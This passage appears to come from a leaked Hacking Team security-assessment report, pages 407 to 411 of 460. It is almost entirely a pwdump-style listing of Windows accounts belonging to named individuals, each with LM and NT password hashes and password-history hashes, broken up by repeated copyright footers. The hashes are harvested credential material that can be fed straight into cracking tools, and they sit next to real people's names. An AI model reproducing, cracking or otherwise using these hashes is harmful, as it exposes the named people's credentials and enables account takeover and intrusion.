MSavoia_history_8:1181:2804A835FF9C7F5972A4E6A6AF99C061:8B4BB8F9B7BD78561E29BE0C271B6F0D:::
MSavoia_history_9:1181:E8F67787AEEAD385B0D866F8E2272AD6:93FA02776F1813B52B69AD53B2D7CB64:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 407 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
MSavoia_history_10:1181:08BEFE6FEACDDBAB6FB9A7EF37043CD6:B3FC33B877E253C6CADC253B23E93A0A:::
MVilla:1182:93B8776368E65F261E738B62AAA101E6:A0904F991155D7120B1CAA56F37516D9:::
MVilla_history_0:1182:93B8776368E65F26B5FD92BAF3B41A2B:93333A9BD987752F61D40FE47D1F4412:::
MVilla_history_1:1182:93B8776368E65F2615BA803CA375452D:BF48E119450654A72D9A2B19E1B9C08E:::
MVilla_history_2:1182:93B8776368E65F26358F373A73DA085C:2F0D83EC1A633E40AE6DD4807C22B5F9:::
MVilla_history_3:1182:93B8776368E65F26C7C2956EA10D4FCB:5D1CC9B002C93DB6B5821A0FC8044684:::
MVilla_history_4:1182:93B8776368E65F26F460284AB1601DE1:75F42C6486007C14550BC03C40969C5D:::
MVilla_history_5:1182:93B8776368E65F26BDFA37019E7A5916:4DE5C76F61762C6E74FDCD5760F741E3:::
MVilla_history_6:1182:93B8776368E65F263BE1F70D283C17AF:14E3DAB94BC71D7995953FC58C69CE8C:::
MVilla_history_7:1182:93B8776368E65F26FEACFE9C95C42171:98D44917174E0D235A25C301B4E8FF77:::
MVilla_history_8:1182:93B8776368E65F2681EA236A7E695712:89E019A6BEA80EBA52992C1CBD25C79A:::
MVilla_history_9:1182:93B8776368E65F26CAD15523D237027E:0640A6D2D37637C9942BA6782289B99F:::
MVilla_history_10:1182:93B8776368E65F26B032ACBF6AE43317:F600D429C12091B1B4192CD645FAED45:::
PAdriani:1183:C2C7B0A5825AA122C2265B23734E0DAC:34B94D230F8FADB9E73A1E34039F7FD0:::
PAdriani_history_0:1183:BBC1AFCE0CA1E5EEAAF966491077C1C0:2E924D52BE604F86F1918CAF74188C56:::
PAdriani_history_1:1183:94A4FADD83FEFF5B2FDDD48F74F50C51:B5997497E320B3EE857193E866CA8500:::
PAdriani_history_2:1183:BBC1AFCE0CA1E5EEAAF966491077C1C0:2E924D52BE604F86F1918CAF74188C56:::
LBaratta:1184:BBC1AFCE0CA1E5EEAAF966491077C1C0:2E924D52BE604F86F1918CAF74188C56:::
TBarozzi:1185:6AF1581EF444ED49FF17365FAF1FFE89:290F24A8A4606BBC32AD3177E77BA812:::
TBarozzi_history_0:1185:6AF1581EF444ED4941A86CC7FA9D87FE:C52E2D6C27F39955BB8211A631F09109:::
TBarozzi_history_1:1185:6AF1581EF444ED4925AD3B83FA6627C7:1C1C57249E3C8C9452AC1E18C3800029:::
TBarozzi_history_2:1185:986C1EC444C2254FA30B0B9EAB62051F:ED1B87C32A3811E0B1075C709E382250:::
TBarozzi_history_3:1185:6AF1581EF444ED49EE48FAC0003887DE:05BD977543D318E815EF134C26B67AFF:::
TBarozzi_history_4:1185:6AF1581EF444ED491BDE240CCB97B3CC:862B4E0D617A6FFC88466C69510121F3:::
TBarozzi_history_5:1185:6AF1581EF444ED493830AB41F50B8C79:6CCCA2C8871F93BBBDABD6E39352288C:::
TBarozzi_history_6:1185:6AF1581EF444ED491AA818381E4E281B:363FF9AA5C7EE3085BAA07315B0C594F:::
TBarozzi_history_7:1185:14C114578D7BA976AE91A15A9FDF9D77:80952FFDBC90D44B7E85BD75C87702A9:::
TBarozzi_history_8:1185:14C114578D7BA97641A86CC7FA9D87FE:203F10F8725AF02250B592689B4A96C6:::
TBarozzi_history_9:1185:14C114578D7BA97625AD3B83FA6627C7:88FDAFE0E056012DAFCE308C8395CB47:::
TBarozzi_history_10:1185:C8C9F7C1AC88B31C3EFDBE0C6057D816:AAAD26B0EF0130A797B31C9247D5E177:::
GBoccardi:1186:A5B7FDCEAC874140A1CFB79381BFD03C:684C2F89DEBCDC65D4752DC754B59AB0:::
GBoccardi_history_0:1186:A5B7FDCEAC8741404D0565D34DC3EB22:122670633CD64D2DDD58600AC3BFC5C6:::
GBoccardi_history_1:1186:A5B7FDCEAC87414025AB6815ADDE7619:F7ADD4402B774E95A51A48190C986AD7:::
GBoccardi_history_2:1186:A5B7FDCEAC874140EB316920D2027E16:38BA8243E8EB77A58D77C40E9412A922:::
GBoccardi_history_3:1186:A5B7FDCEAC874140321484D86ADC332A:4A16F240FCDB51CA994510D719D45B2D:::
GBoccardi_history_4:1186:A5B7FDCEAC8741407EFA5A04975BC43B:D239B9A4A428C199E469247DFB462EF8:::
GBoccardi_history_5:1186:A5B7FDCEAC874140346B2B00D41FBCF4:D06648369214FC39FACDEF9FEDF5654D:::
GBoccardi_history_6:1186:A5B7FDCEAC874140AE64E8458CD5D3B6:4527228281B2FC85C125FD8DA19FB497:::
GBoccardi_history_7:1186:A5B7FDCEAC874140D772ED253A981CEF:AF507D7D40D269DF74A02AAB69B36FC2:::
GBoccardi_history_8:1186:A5B7FDCEAC8741403B7631FCE03308B9:917AD53840E18620155C8E78E301C27C:::
GBoccardi_history_9:1186:117D5A0BA404B5257584248B8D2C9F9E:DFC220E22F7DE0EDE09F4F136E78C242:::
GBoccardi_history_10:1186:C53EA2C2DFAD4CDA93BE3A377C968336:D3504C5F34B32662E2B04AB986E21DD6:::
FBruni:1187:9C211D62D397F6DB4E20A9D345AE065E:EC245F4FB2FB617BF2046E91142896A0:::
FBruni_history_0:1187:9E52035211527F72E917F8D6FA472D2C:E295A7C8FB1D72432804C6E8BDB07370:::
FBruni_history_1:1187:D4F6FE102644881B570A3F52BFFF0944:E1E85E778DA7ADF28579DD336651DF55:::
FBruni_history_2:1187:8A4899F2D57548A4D67EB7B08921A946:DFA1AB4D1BCE879D7FFEA26C8A73637B:::
FBruni_history_3:1187:NO PASSWORD*********************:814C7D56E703F69A90711EE709D62437:::
FBruni_history_4:1187:54FD5F4108C82B360A1C9CB84E72E3D2:872C97EC7420200D1CECC870334F5D5A:::
FBruni_history_5:1187:DE59661E9FD50B4B3D1C927D1C90C67C:B8B3A8AD2082ABD181805163A80714C2:::
FBruni_history_6:1187:E4CE6D642C660A24D7A4419918F6767F:772CC8896EEADC38D202EED70D0065BF:::
FBruni_history_7:1187:F1935FFE2DBB70C7467A148C7BF7858B:0223718643A276FC9ACD337C23714CBF:::
FBruni_history_8:1187:9C211D62D397F6DBFBB8B858122EF523:4E057681AA232EBA2D441F15D8756E08:::
FBruni_history_9:1187:B192DD70D75244A6468AA0DF9E2394C4:185A9B76AAD47C9C14E8F9F976036F21:::
FBruni_history_10:1187:6B5B1204F818B62D95E335A743C2EDC0:611E650C3867242BA9F76E44FD507D02:::
ACaruso:1188:A3D92A7E45484E0325AD3B83FA6627C7:511D5355F329B9727C6AB47E334C7ECC:::
ACaruso_history_0:1188:A3D92A7E45484E0309752A3293831D17:FAB470EF43B96351AD3485D73A24FCE4:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 408 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
ACaruso_history_1:1188:A3D92A7E45484E0336077A718CCDF409:6BCA39D1AE37405A8947FF0A1A994B25:::
ACaruso_history_2:1188:A3D92A7E45484E037C3113B4A1A5E3A0:043D44F1CC0D7A49FB8B146A1C3751C1:::
ACaruso_history_3:1188:A3D92A7E45484E03C81667E9D738C5D9:DFAC756205F0B98213C62534EC7B09BB:::
ACaruso_history_4:1188:A3D92A7E45484E039C5014AE4718A7EE:D3CCB0EF1630F59B1DCDDD2EA56DF540:::
ACaruso_history_5:1188:A3D92A7E45484E03FF17365FAF1FFE89:4B128A422FB294063FB9F08D7429C30E:::
ACaruso_history_6:1188:A3D92A7E45484E031AA818381E4E281B:00B620833A63C96A6B8F5E22CBCC0914:::
ACaruso_history_7:1188:A3D92A7E45484E031D71060D896B7A46:749F2ADEE8DB3C2232B5C09D23EAF0E9:::
ACaruso_history_8:1188:A3D92A7E45484E03C20BA3BC60904793:12C9CB3563C1B68921C498E4A833032E:::
ACaruso_history_9:1188:A3D92A7E45484E0373251AA2B4314B90:8FBA2B890CA11D85AE1CA067E75AC3BF:::
ACaruso_history_10:1188:CEEB0FA9F240C200C5D3B53DC1AA2319:BC7429A0123AA5669798685C0D25E632:::
PCirillo:1189:D03B20B3BF2B53190571BADBDE8E53C9:2770AF2C3BBAE92C5A3F915CB32F3634:::
PCirillo_history_0:1189:5D9536A08D3EDA7117D7CF00474E745A:51C4AE6D38A21881F0E1FE6EA55B3F4B:::
PCirillo_history_1:1189:EC5B95536A0B3333CCF9155E3E7DB453:95EAC0B6D41E185099E4B1724E65250B:::
PCirillo_history_2:1189:B619DFBE21E63173CCF9155E3E7DB453:DB12E2538F1EB7C53B079915B6D3DBF2:::
PCirillo_history_3:1189:B619DFBE21E63173B757BF5C0D87772F:9EF43BD121BFDA46BF57C1BDE6F34190:::
PCirillo_history_4:1189:C3AA6729A137604274BF573CAFDDED69:7D8B730A80C5A5D60F1AE422357132CF:::
PCirillo_history_5:1189:C3AA6729A1376042CD92DE3673ED2CDA:E064ACB622C43A428A345139A390A3EA:::
PCirillo_history_6:1189:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
PCirillo_history_7:1189:CD21E941F3B56DEE27320DAD6BDF3BC2:16EC5EF4DFA72D5034BC0485AE0DFFF8:::
PCirillo_history_8:1189:CD21E941F3B56DEE7339166302E79226:6D1070708E5CE5D5EE78DAB5DD527DBD:::
PCirillo_history_9:1189:CD21E941F3B56DEE8568B0B2D42A802E:D5DAEEAD955EF83602B1C1AD82209763:::
PCirillo_history_10:1189:740A6715782B981840EDEE393E0D6E2F:0B561EF0F7174F1815F94CB702D4D2A5:::
GEgidi:1190:808B90E66B8169D465C4A55F32B3BF85:1E8CF41F8EB01F576522A73FEDB4EB5D:::
GEgidi_history_0:1190:BBC1AFCE0CA1E5EEAAF966491077C1C0:2E924D52BE604F86F1918CAF74188C56:::
GEgidi_history_1:1190:BBC1AFCE0CA1E5EEAAF966491077C1C0:2E924D52BE604F86F1918CAF74188C56:::
GEgidi_history_2:1190:52F127B7985CF2E72FDDD48F74F50C51:081234D6AD79F9BAAE7D3163C04DC3FB:::
GEgidi_history_3:1190:BBC1AFCE0CA1E5EEAAF966491077C1C0:2E924D52BE604F86F1918CAF74188C56:::
RLombardi:1191:D14A60317340E663E68AA26A841A86FA:9DF8ED5F8BD50DB44EA5B792F3319895:::
RLombardi_history_0:1191:60ABB998CCBF62AAE8636A80727A454A:23119FE38768FC558C9288C36FA9CB44:::
RLombardi_history_1:1191:BE0D6D87CDDC9574E8636A80727A454A:B12A9B7C2E86C3710F3141C90C982C81:::
RLombardi_history_2:1191:EDF828C7271149F3DF61CA35DEE5AA58:CFB3A890E0E839DBA09F38672C0DB3A4:::
RLombardi_history_3:1191:AD74F00B9D3F23892FDDD48F74F50C51:C524AC993CD0B89B6C31B06F4CB44B75:::
RLombardi_history_4:1191:B769DD249D5E8B7B5CF10F499A9EE4A4:904509944E783D2CD85A116D86355396:::
RLombardi_history_5:1191:074841FB9BF6058EE4BE0161855059FC:8BBE7932DE840BBBBFCEA82C97B7C311:::
RLombardi_history_6:1191:21E9B403C6A39CC7E68AA26A841A86FA:05B845232449029ABCB484A28E848884:::
RLombardi_history_7:1191:F70D334428180EA1E68AA26A841A86FA:94E790CA4AEE69B057C510DA485CDFE5:::
RLombardi_history_8:1191:89033B958FB92BCAE68AA26A841A86FA:673FB5CDC8A6E314494838DDAF3A23E1:::
RLombardi_history_9:1191:0DBA79EABAD479FC2FDDD48F74F50C51:09C33F9D001B9D501B6BBC789D15CBBD:::
RLombardi_history_10:1191:FF310DF3D88CFC4C1D71060D896B7A46:ECD86EC92BCB622E6E9AF6E54220EBEF:::
EMalasisi:1192:E5CAFCF202214625E7D403AAFB5E00F6:33061D547FADFD3CB4F2A8A73A1EE750:::
EMalasisi_history_0:1192:2492632672AFBE42E7D403AAFB5E00F6:14B2FF4AC0C3A10B3034983BCC565AAC:::
EMalasisi_history_1:1192:92D7A41C84AE5F827584248B8D2C9F9E:772F2B167D9FFB8784C27A9EA0422DD8:::
EMalasisi_history_2:1192:41D3F25620BE71F1C2265B23734E0DAC:248366AA882786E7275449CEB4921185:::
EMalasisi_history_3:1192:NO PASSWORD*********************:540B87004BE38C04147CE1461628C654:::
EMalasisi_history_4:1192:4EA0A50A027D0B38B14FD58A657A9CA6:52909507AB048AA027CD215DCDD1A6DF:::
EMalasisi_history_5:1192:29AF283F7BD63D69AB47A1B697FBF322:05274B652FD1B2592528DE3C8E20FD53:::
EMalasisi_history_6:1192:NO PASSWORD*********************:53E7650E87C3B9E1357867AD113FD363:::
EMalasisi_history_7:1192:3A46D34929F3E4BCE68AA26A841A86FA:89F9043DB99A876C511C7F4A0B814F6E:::
EMalasisi_history_8:1192:D15F2C26B6ECD5725CDCB59F7F65C67A:8D877678C3760B67473E53A1608DBABE:::
EMalasisi_history_9:1192:01C100ECDD32C3BCAE705BC8970A8379:C6AF06E27188E1C32278F84AE82E0A4F:::
EMalasisi_history_10:1192:B460426AF3A59F82AB47A1B697FBF322:02D6F100D501C3D546B4EF9007D2AE5A:::
MMurilloPecchi:1193:E50C3323042F3913AB4507B79537ED8D:D639D86AD933B5CF7A7ACDAD5EAB7981:::
MMurilloPecchi_history_0:1193:D8A9C37A3474C6220DEDD108E3519F58:6DB03D56886F09501DBB2CE763E6DF3A:::
MMurilloPecchi_history_1:1193:35C10E9D4E56F6BFA0394EA2CA2D261F:56897285BEBE9AC8D28BBE0633787AFC:::
MMurilloPecchi_history_2:1193:1D5F84D6AA606AABB03650078460FB5A:25DEDB70E7E1F6617A74F12B23FBF757:::
MMurilloPecchi_history_3:1193:3051A29CADD5D3F00DEDD108E3519F58:6E23DE2991A3AB0F6A41BEF35B198DBD:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 409 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
MMurilloPecchi_history_4:1193:7FB1C5EA1FAFBBA4A0394EA2CA2D261F:CEA71D3BFE2A53F3DFA769D18EBA2E11:::
MMurilloPecchi_history_5:1193:8ED565BB4FC92FB51170E0A48692C806:0B153F72F580E0544FA39D29984D257D:::
MMurilloPecchi_history_6:1193:8ED565BB4FC92FB51170E0A48692C806:0B153F72F580E0544FA39D29984D257D:::
MMurilloPecchi_history_7:1193:8ED565BB4FC92FB51170E0A48692C806:0B153F72F580E0544FA39D29984D257D:::
MMurilloPecchi_history_8:1193:7FB1C5EA1FAFBBA417306D272A9441BB:01283C64FEBC1CD932CFD7C33F0949E2:::
MMurilloPecchi_history_9:1193:80998327E974A0D90DEDD108E3519F58:A9D92784B6A69B77DCBA6C853A087DD6:::
MMurilloPecchi_history_10:1193:537ECFB5CCD990C1A0394EA2CA2D261F:7B17D4AAB7E54F5F12944CFF3386F686:::
CPatamia:1194:9DED9CEC3B21ED7E1AA818381E4E281B:4EE511114E307EF3B25A574D8B0D525D:::
CPatamia_history_0:1194:9DED9CEC3B21ED7E1D71060D896B7A46:BE465500713A98E2EEF79445852004D0:::
CPatamia_history_1:1194:9DED9CEC3B21ED7EC2265B23734E0DAC:5052D49529F8D3FF782F534E81955E0F:::
CPatamia_history_2:1194:9DED9CEC3B21ED7E25AD3B83FA6627C7:3F3D42B9AF413B8F6D29095D9577E97E:::
CPatamia_history_3:1194:8D3E15638B195B1909752A3293831D17:DD4E06CF46CC260F5C241AB2E680AEB5:::
CPatamia_history_4:1194:8D3E15638B195B1936077A718CCDF409:4FD1AA988C0DCABD63F4C3D5960C247E:::
CPatamia_history_5:1194:8D3E15638B195B197C3113B4A1A5E3A0:E24E7970F0B394F51753B027DC8430E4:::
CPatamia_history_6:1194:8D3E15638B195B19C81667E9D738C5D9:69D33B70D5E7308950A91DBE62AAB9BB:::
CPatamia_history_7:1194:8D3E15638B195B199C5014AE4718A7EE:FBA38076C07089097FDF51EACC5FC3D8:::
CPatamia_history_8:1194:49794ED9443BB7FF05C46B50BC203DAA:21E094EED62A8D6024F3B7F2325FE76E:::
CPatamia_history_9:1194:49794ED9443BB7FF05C46B50BC203DAA:21E094EED62A8D6024F3B7F2325FE76E:::
CPatamia_history_10:1194:A11B1BCDE64457CD25AD3B83FA6627C7:53931A0C22885AA34E9CAF3E6758D667:::
CPietroluongo:1195:13F69EAF8479455515F0EF7FF2B046BE:46CD89C3C6D62FB65D6B53F00F233955:::
CPietroluongo_history_0:1195:40A349C62E8DE84F1A787A994B5CE317:7D0D05583C48F6E241DD217030918083:::
CPietroluongo_history_1:1195:E0244B63E79F4184F4AF492D4E1F2487:49BA33C079A0428FD2583D7B1CC3C2CA:::
CPietroluongo_history_2:1195:83B047B06E3DFA62EDD6620FAD881056:BC9BA5ABCFF7CB3F7015D9BCA6DD72BB:::
CPietroluongo_history_3:1195:F6BFB92D6CABCF3F5CE185708A82D85C:35B4F71F1CF1D1E6F8DAC63C7660A385:::
CPietroluongo_history_4:1195:CB6ABE4CCF9E6FEC32F394FF7D9DFA37:24432D020846CC8E490F6CE5AEF3B725:::
CPietroluongo_history_5:1195:B45ACDCC3B2A5737FBB8B858122EF523:4F230DD458FB1AD480E63AF5C9020951:::
CPietroluongo_history_6:1195:F59C4B7E69E9ACDFFBB8B858122EF523:3EACC3728C814C870E3970ED591F8B68:::
CPietroluongo_history_7:1195:123262EBA2D940AB32F394FF7D9DFA37:A20D9CFEC67B2683F78FBC3A55B48DA7:::
CPietroluongo_history_8:1195:3B9847448410F0E8867F1A28EDEBF47A:FA6F3B8ED24BCF2EF0A285932342AED4:::
CPietroluongo_history_9:1195:BE19AFF5AABA82A346B76C7D8FC3B435:5129875A44A949C94AEE25A3B573104E:::
CPietroluongo_history_10:1195:6B5DB3B9A1EE26BCAF1B067E77CEC994:A36C42099C2C812544765777B9ABDBBD:::
MPrimavera:1196:NO PASSWORD*********************:0D03E58BEA4B34F4CA2ACD2E48753199:::
MPrimavera_history_0:1196:3A04076B3B138EF54779406AB5238555:C83A2BD0199684415E486B9E5630273C:::
MPrimavera_history_1:1196:43D1A6EDEDC569DA75DA33E02F3D3D43:C8411BA7F7E689A37EB738F8F9EFC937:::
MPrimavera_history_2:1196:NO PASSWORD*********************:775EBAC4F876742ABA8D69EC8DD53170:::
MPrimavera_history_3:1196:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
MPrimavera_history_4:1196:14DE924FAE53164FC7AAD0E0E218F1AD:ED8DF772A274DC39717756FFCF1C700D:::
MPrimavera_history_5:1196:F6EFBC776063397660A26E5DEE47B9A5:D0E7B91CD6CA4D1D10BA839294A37EE5:::
MPrimavera_history_6:1196:FFFDB2E9FBF3F47FD0C76C5BFD7B4F84:949F6BEA9282C0DE2FB9019CE02110CC:::
MPrimavera_history_7:1196:NO PASSWORD*********************:1DD710105F2018290F3A147383FFAF41:::
MPrimavera_history_8:1196:NO PASSWORD*********************:FFBC44F03887E01B059B6795086A5C5B:::
MPrimavera_history_9:1196:NO PASSWORD*********************:57DD66A5D3F19CE5C1FC1EEF55644471:::
MPrimavera_history_10:1196:A36272FE552BD81B4AC773271A36C5F2:A4CEA9883AA8AA69C2EA21880E5D6C2E:::
CRenzi:1197:C74F144A325104222CE1892B2AE288F3:FD39315CCF2B8B1A8A145217938D9E3F:::
CRenzi_history_0:1197:37306CBE2EB3CF090743E54E17915988:E71F768483BED0CF8B9257C010CE730B:::
CRenzi_history_1:1197:F48A5A81524868149E9BA776C674BB85:5ABCA2787920815E3AEBD63022CB597D:::
CRenzi_history_2:1197:FC5F5B4285ED8E648BA6CB7589FBB61E:3622DCB387FB40CAB8BA9E901CAFADBF:::
CRenzi_history_3:1197:20C345E74D1F02D9436264F2A8FF7DC6:00EF562636FF3B7A547943A7F3AF52B5:::
CRenzi_history_4:1197:C05D8A40392895298B07AF3C9E1966D1:928851FF658A40D21302CA3AF1760B45:::
CRenzi_history_5:1197:55B38C7384BE95FC33C48235BE199CAF:79E3E7B1D5E050D91ECB8761CED5C897:::
CRenzi_history_6:1197:30EF817A3E373A0A7FC572CA7AFF5B3C:6BEB3A0911E2A4B355112824F68055D6:::
CRenzi_history_7:1197:39616BB0471D663F33C48235BE199CAF:479FF4ED2DAAE8B632B441C7C3E30A25:::
CRenzi_history_8:1197:D7FF5F8E4BFB71B77FC572CA7AFF5B3C:870D0F1A18B20A553071BBCA91AE26BD:::
CRenzi_history_9:1197:1931DF0922C746EE93BE3A377C968336:69C6659B04D12410C853D16E8BD7EA06:::
CRenzi_history_10:1197:FF16800EAC1FFF3425AD3B83FA6627C7:95ABBEA728B00F16DC3A3546A5DC6B0E:::
RRizzo:1198:1B58CDCD0E922080E7D403AAFB5E00F6:00D8C6807BE38E488AF251150E30E77A:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 410 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
RRizzo_history_0:1198:334D4E47FD9584F64EB3A8E5EDCB96E0:FCB949A24AC8A48E03276F9C0ECC7E94:::
RRizzo_history_1:1198:6268C88E9AB728075BDB0513430B12A5:5EA5966F505A066C632AF7780542A83B:::
RRizzo_history_2:1198:074979FD1EC1300BDD1DDD315F889C13:E9E4C680B2E90E15D5B2295337202ECA:::
RRizzo_history_3:1198:NO PASSWORD*********************:06C47AF50F75CC42443A0F4C01E981FC:::
RRizzo_history_4:1198:B5FCF22CC7964C1CB359593DE3079D0E:61C31AC7052172F909D6841E16EE3D84:::
RRizzo_history_5:1198:6605DABD83911FE0C03FA9B8D72E83D6:207E8CD715E69F502129D972216C188D:::
RRizzo_history_6:1198:9D93EC91CE9EC142DF5A8B5C5FCF9309:3EB8B62268DDBEBE6A5EAECCC2EC4F25:::
RRizzo_history_7:1198:7E0DDC6542A335E9C81667E9D738C5D9:B8C2C9455233EA08F2EC02BBBED49FB7:::
RRizzo_history_8:1198:398E0E8516A81E6EC81667E9D738C5D9:60EB6EDE95D0E3E9414C6961B0375A2E:::
RRizzo_history_9:1198:843564A4DC1089951AA818381E4E281B:491FA071195C6C0A14E6BBACECB38A24:::
RRizzo_history_10:1198:0624DCC29E8C26CCFF17365FAF1FFE89:81FF48D9E3318A0EEB6E9B298F6E6212:::
CTretto:1199:BF6055B589337675A767A86C5FF530E5:29DFB523185A607C1037FF62460F9275:::
CTretto_history_0:1199:BF6055B58933767589D3EFFCB6C9471B:60AD6E131772A4FE7414C7D01ABAB596:::
CTretto_history_1:1199:BF6055B5893376759B74446CD20AF19E:DBF3AA0FB41422C7A3C72CEE5E2A8BDF:::
CTretto_history_2:1199:BF6055B589337675D37AE49C48BE9CE9:7DDB6671A449E7EB20A74862965A99CF:::
CTretto_history_3:1199:BF6055B58933767564EFF2A7D80A6782:834BF5046922EF30B0AC878A42AE4371:::
CTretto_history_4:1199:BF6055B5893376758DE7AB447C089065:34706713307BE004CC24E7585504C196:::
CTretto_history_5:1199:BF6055B5893376752E90CF2649FF70E3:5A24F7F55C607B4A27A1C1A76BB1E8F9:::
CTretto_history_6:1199:BF6055B58933767532309DE89C269458:AFF05C1FD86831081309FD71D6ADEDE6:::
CTretto_history_7:1199:BF6055B589337675B89AF75D57572564:ED8DC0E61561516E53B51CEF8532772D:::
CTretto_history_8:1199:BF6055B589337675BBA757A69B8B2F15:F89C4CCD4D551997CF31FEA864A5E694:::
CTretto_history_9:1199:BF6055B58933767501B2266A949DF9F8:C71034237FB96AB1855B0BE4BE2C7E53:::
CTretto_history_10:1199:BF6055B5893376759A0463C62AE89D7F:DFD8FC8640F05A4B9ABDA24FC6FF4BC5:::
VVecchiarelli:1200:E2185DF0943EE90396434D6DAA0837D5:7A95B7899F6BAD245EB67D4AB3ADD690:::
VVecchiarelli_history_0:1200:E2185DF0943EE9039A5D9ED7699167E9:0F66FA8842E36AB80DE9B78FCAA21C09:::
VVecchiarelli_history_1:1200:E2185DF0943EE903C7C10941683A1125:D968820784BE8665A411A8460982F1C0:::
VVecchiarelli_history_2:1200:E2185DF0943EE9036D20C8E829279A9F:9F2B798AB166A8CE6FE8E7834EB4840B:::
VVecchiarelli_history_3:1200:E2185DF0943EE90351A71FAF7D3AA782:BCE82A1E996E8958A9326D71917E0D78:::
VVecchiarelli_history_4:1200:84148D20756308A5743C544636BCAF48:9D77A3CA4101288C1E8CEED213DBE379:::
VVecchiarelli_history_5:1200:9E42671D31AF0F229472879F1849158E:47574034F5FDB683D2C478F6031FEC5E:::
VVecchiarelli_history_6:1200:BBC1AFCE0CA1E5EEAAF966491077C1C0:2E924D52BE604F86F1918CAF74188C56:::
ATirassa:1201:43B43026C7120B9F2242C7EB90A7AECD:349075896BA5FBB403A8D7A81E606EFF:::
ATirassa_history_0:1201:E401CF8D88853C6B6D6C53AED24072FF:FE89F2DA54AEFE558F01916B1F940327:::
ATirassa_history_1:1201:43B43026C7120B9F2027E7130B725993:FBC2A51646452678B17A6E4AAF2AF3B8:::
ATirassa_history_2:1201:E401CF8D88853C6BD6E547A2E02FE66C:48CEBCA8D0B59FFD6096F148922D63C0:::
ATirassa_history_3:1201:43B43026C7120B9FD936937A8D0CE11C:67DCCD4087DAE49033C3B2E5883BCD31:::
ATirassa_history_4:1201:835F931A037644DED6E547A2E02FE66C:0AB6E8645DE43681237630DC8FFEF463:::
ATirassa_history_5:1201:43B43026C7120B9FE00A3CCE1E1CBB04:71145ADA0E81407B4FD358A0A355EC55:::
ATirassa_history_6:1201:CCCB13C6BFCE8E02F27609525CF419AD:192BBDA6692B19E90BF833500D09AD61:::
ATirassa_history_7:1201:835F931A037644DECDF7A30B580BF051:B264FC5BB9109BD49E0736AEA639DE77:::
ATirassa_history_8:1201:CA3E45C8AEE75D93677136605041C690:2D386A9798E03D1C4BF31B84A7DBF34B:::
ATirassa_history_9:1201:8D874A4DC6D98279E9ACC06E851F6F1E:C285E989856E279F56D0DCABE8FB62DD:::
ATirassa_history_10:1201:38A9313E32A9471FAA0C3C51FF0AB3C6:EF24F961DC091BA01DD4CFBA64B4A7FD:::
GBasevi:1202:9F45277B6E6EF7FB1170E0A48692C806:F04DF6378989EC8CB360E847213DB443:::
GBasevi_history_0:1202:0568DBB8DBC44F7DB3A23F4730883E44:EDDAE5C9CD070EA894B2538CAABFC796:::
GBasevi_history_1:1202:81F390DFDA8E43F61AA818381E4E281B:250694A7CD237B3B0139CB6F39CE5EB9:::
GBasevi_history_2:1202:81F390DFDA8E43F61D71060D896B7A46:321DE872C7AB060106D99A378199831F:::
GBasevi_history_3:1202:81F390DFDA8E43F6C2265B23734E0DAC:3455132FBD5F04C2E21FF19F75BD436B:::
GBasevi_history_4:1202:328FACD45D7E54C2C81667E9D738C5D9:15A54E1B8DBBEF4E7D1903B450CDE6F8:::
GBasevi_history_5:1202:911B53C3DC37B94ADF61CA35DEE5AA58:5AD6DBD77F993473EB533FA7E259A5C3:::
GBasevi_history_6:1202:BBC1AFCE0CA1E5EEAAF966491077C1C0:2E924D52BE604F86F1918CAF74188C56:::
LGrandini:1203:4E669A896FD2EFE74E669A896FD2EFE7:2A3461880E5945108D73C3BE3BEBF9D3:::
LGrandini_history_0:1203:FCCB4B2EF0E2B9F4B75E0C8D76954A50:E06BBB83293DE66EF568AA8C78A8F844:::
LGrandini_history_1:1203:25B25A96A5860EE79DD8B64945D1EDEF:842BB1081EE0206F4563526DF587A1CC:::
LGrandini_history_2:1203:NO PASSWORD*********************:ADE646DF1213BBB3D42FB14F9D06F349:::
LGrandini_history_3:1203:453F421A7782B4D439CA3745F8E7A7E9:3FFD15E834BE663F40F4125D91B47105:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 411 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
LGrandini_history_4:1203:7C03C0F57AA88B569A67A213CD192E0C:F871E0F65B1EA890D3E1CAF5CDBDDB2B:::
LGrandini_history_5:1203:7C03C0F57AA88B569A67A213CD192E0C:F871E0F65B1EA890D3E1CAF5CDBDDB2B:::
LGrandini_history_6:1203:505F20A60B4706B0CCF9155E3E7DB453:CF78627EF770A6EBD590D4091AEED85D:::
LGrandini_history_7:1203:1F17359B7FF4D2E8EFB303C2F126705E:42960450871B813EE19FFD0390EB25EC:::
LGrandini_history_8:1203:NO PASSWORD*********************:F6873B50D025BB31AE7EB5EA0374DA42:::
LGrandini_history_9:1203:NO PASSWORD*********************:B98C415A1CFD5CC5BADFCD7140F0365A:::
LGrandini_history_10:1203:25B25A96A5860EE79DD8B64945D1EDEF:842BB1081EE0206F4563526DF587A1CC:::
ODubroeucq:1204:B2F50A2D8FAEBE1C09752A3293831D17:9C81484AD8F69FC84807F903A000ECD7:::
ODubroeucq_history_0:1204:B2F50A2D8FAEBE1C36077A718CCDF409:D33BEBB31A2B8121FEB1AB2FB7A31A46:::
ODubroeucq_history_1:1204:B2F50A2D8FAEBE1C7C3113B4A1A5E3A0:FBF35EACF60553DF9F3C6A92FE178D95:::
